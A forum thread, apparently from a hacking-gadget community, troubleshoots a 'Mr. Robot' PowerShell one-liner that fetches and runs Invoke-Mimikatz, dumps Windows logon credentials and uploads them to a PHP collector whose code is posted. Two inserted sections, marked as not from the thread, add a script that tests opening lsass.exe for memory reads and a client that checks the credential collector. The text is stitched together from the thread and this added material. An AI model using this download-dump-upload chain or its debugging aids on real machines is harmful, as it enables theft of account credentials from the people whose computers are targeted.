
Exmix

15 Second Mr. Robot Hack question


So thanks to ThoughtfulDev I was able to get this working very nicely.

So after testing it on mine and my cousin's Windows 7 PCs (with his permission, of course), those worked great, but when testing on our Windows 10 PCs, I got an error.

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

I tried this on a few other Windows 10 PCs to make sure it wasn't just those PCs specifically. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.


So, from the Mimikatz GitHub site:
https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).


Are you sure you're running it as Administrator?

On 9/6/2017 at 11:00 PM, kdodge said:

 

Are you sure you're running it as Administrator?

100% positive. I'm doing it from my Windows 10 laptop, running this script from an administrator command prompt.

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the Output I put in my first post.


It could be a bug, you might try contacting the author.

One other thing I can think of: are you running an AV? The description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. It kinda sounds like something is, anyway.

1 hour ago, kdodge said:

It could be a bug, you might try contacting the author.

One other thing I can think of: are you running an AV? The description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. It kinda sounds like something is, anyway.

I am, but that is disabled. I know the AV detects it.

Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.

On 9/8/2017 at 11:49 PM, Exmix said:

I am, but that is disabled. I know the AV detects it.

Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.

Windows 10 has patched lsass now, which effectively breaks mimikatz functionality.

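An added diagnostic, not from the thread and not part of mimikatz, to narrow down the "Handle on memory (0x00000005)" error above (5 is ERROR_ACCESS_DENIED). It reproduces the one step that fails, opening lsass.exe with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ after enabling SeDebugPrivilege the way privilege::debug does, and reports next to it the two Windows 10 settings that change the answer: RunAsPPL (LSA Protection) and Credential Guard. The class name LsassProbe and the function Test-LsassAccess are my own names; the Win32 calls, the registry value and the WMI class are documented Windows interfaces. Run it from an elevated PowerShell session on the machine that fails.

```powershell
# Added diagnostic (not part of the thread). Run from an elevated PowerShell session.
# Reproduces the one step that fails in the posts above: opening lsass.exe for memory reads.

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class LsassProbe   // name chosen for this example
{
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }

    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);
    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES newState,
                                             uint len, IntPtr prev, IntPtr retLen);

    // Enable SeDebugPrivilege in our own token, as mimikatz's privilege::debug does.
    // Returns false if the token does not hold the privilege at all (ERROR_NOT_ALL_ASSIGNED, 1300).
    public static bool EnableDebugPrivilege()
    {
        IntPtr token;
        const uint TOKEN_ADJUST_PRIVILEGES = 0x0020, TOKEN_QUERY = 0x0008;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out token)) return false;
        LUID luid;
        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid)) { CloseHandle(token); return false; }
        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
        tp.PrivilegeCount = 1; tp.Luid = luid; tp.Attributes = 0x2;   // SE_PRIVILEGE_ENABLED
        bool ok = AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
        int err = Marshal.GetLastWin32Error();   // AdjustTokenPrivileges sets it even on success
        CloseHandle(token);
        return ok && err == 0;
    }

    // Try to open a process with the given access mask: 0 on success, otherwise the Win32 error.
    // 5 (ERROR_ACCESS_DENIED) is exactly what mimikatz reports as "Handle on memory (0x00000005)".
    public static int TryOpen(int pid, uint access)
    {
        IntPtr h = OpenProcess(access, false, pid);
        if (h == IntPtr.Zero) return Marshal.GetLastWin32Error();
        CloseHandle(h);
        return 0;
    }
}
"@

function Test-LsassAccess {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    $debugOn  = [LsassProbe]::EnableDebugPrivilege()
    $lsassPid = (Get-Process -Name lsass).Id
    # PROCESS_QUERY_INFORMATION (0x0400) | PROCESS_VM_READ (0x0010): the minimum a credential dumper needs
    $openErr  = [LsassProbe]::TryOpen($lsassPid, 0x0410)

    # LSA Protection: lsass runs as a Protected Process Light when RunAsPPL = 1
    $ppl = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
    # Credential Guard: SecurityServicesRunning contains 1 while it is active
    $dg  = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $cg  = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))

    [pscustomobject]@{
        Elevated               = $elevated
        SeDebugPrivilegeOn     = $debugOn
        OpenLsassWin32Error    = $openErr
        RunAsPPL               = $ppl
        CredentialGuardRunning = $cg
    }
}

Test-LsassAccess | Format-List
```

How to read the result: OpenLsassWin32Error = 0 means the handle opens and the failure is somewhere else (the download, the script being blocked, a wrong build of the script). Error 5 with Elevated and SeDebugPrivilegeOn both true means something is refusing the handle to an elevated debugger: RunAsPPL = 1 (LSA Protection, which refuses PROCESS_VM_READ even to administrators), or a security product hooking or filtering the open. Error 5 with SeDebugPrivilegeOn false means the prompt is not really elevated (or the privilege was removed by policy). Credential Guard is different: it does not block the handle, it moves the secrets into LSAIso, so with it running the dump "succeeds" but yields nothing usable. The first line of the error output in the original post, CoInitializeEx: 80010106, is RPC_E_CHANGED_MODE, raised because the PowerShell host has already initialised COM with a different apartment model; it is not the cause of the access-denied failure.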

I have a question about this: I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command as above:

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
?>

 

It was broken up like this before, but that didn't seem to have any effect (I know almost nothing of PHP, so this probably makes no difference):

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

file_put_contents($file, file_get_contents("php://input"));
?>
 

Thanks to any who reply!


It could be a lot of things, but you should start with checking if the file has write permissions on the server you're running this on:

<?php
// The name includes the current time, so the file never exists yet, and is_writable() on a
// path that does not exist returns false. Ask about the directory the script lives in instead.
$file = __DIR__ . '/' . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if (is_writable(__DIR__)) file_put_contents($file, file_get_contents("php://input"));
else echo $file . ' is not writable.';
?>

Run tcpdump with this to see if it's not writable.

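An added test client, not from the thread, for checking the upload half of the one-liner without involving mimikatz at all. It posts a constructed, clearly fake body to the collector the same way the one-liner does (WebClient.UploadString sends an HTTP POST with the string as the request body) and inspects the reply. The URL https://MyWebServer/My.php and the function name Test-Collector are assumptions for this example; the body is constructed test text, not captured data.

```powershell
# Added test client (not part of the thread). Posts a constructed, fake body to the collector
# exactly as the one-liner does (WebClient.UploadString = HTTP POST) and reports the reply.
function Test-Collector {
    param(
        [Parameter(Mandatory)][string]$Uri,                        # collector URL (assumed name)
        [string]$Body = "CONSTRUCTED TEST BODY $(Get-Date -Format o)`r`n(no real credentials)"
    )
    $wc = New-Object Net.WebClient
    try {
        $reply = $wc.UploadString($Uri, $Body)                     # POST; $Body is the request body
    } catch [Net.WebException] {
        # Connection refused, TLS failure, 4xx/5xx: report the message instead of throwing
        return [pscustomobject]@{ Uri = $Uri; Ok = $false; Reply = $_.Exception.Message }
    }
    # The PHP collector above prints nothing on success and echoes "... is not writable." on
    # failure, so an empty reply is the good case and any text is an error to read.
    [pscustomobject]@{
        Uri   = $Uri
        Ok    = [string]::IsNullOrWhiteSpace($reply)
        Reply = $reply
    }
}

# Assumed URL; then confirm on the server that a new .creds file appeared in the script's
# directory, owned by the web server user (www-data on Debian/Ubuntu).
Test-Collector -Uri 'https://MyWebServer/My.php'
```

Use an https:// URL for this and for the real one-liner: with a plain http:// collector, every dumped credential crosses the network in cleartext, which is the same thing a tcpdump on the path would show. WebClient validates the server certificate by default, so a self-signed certificate on the collector shows up here as a WebException rather than as a silent drop.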
On 11/19/2017 at 1:25 PM, kdodge said:

It could be a lot of things, but you should start with checking if the file has write permissions on the server you're running this on:


<?php
// The name includes the current time, so the file never exists yet, and is_writable() on a
// path that does not exist returns false. Ask about the directory the script lives in instead.
$file = __DIR__ . '/' . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if (is_writable(__DIR__)) file_put_contents($file, file_get_contents("php://input"));
else echo $file . ' is not writable.';
?>

Run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

 

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately, but clearly I wasn't right. The file has write permissions for www-data (the file is owned by www-data). What setting do I need to set so that this file has permission to write to the server? Sorry for the noob question. Thanks again for your help in identifying the issue!

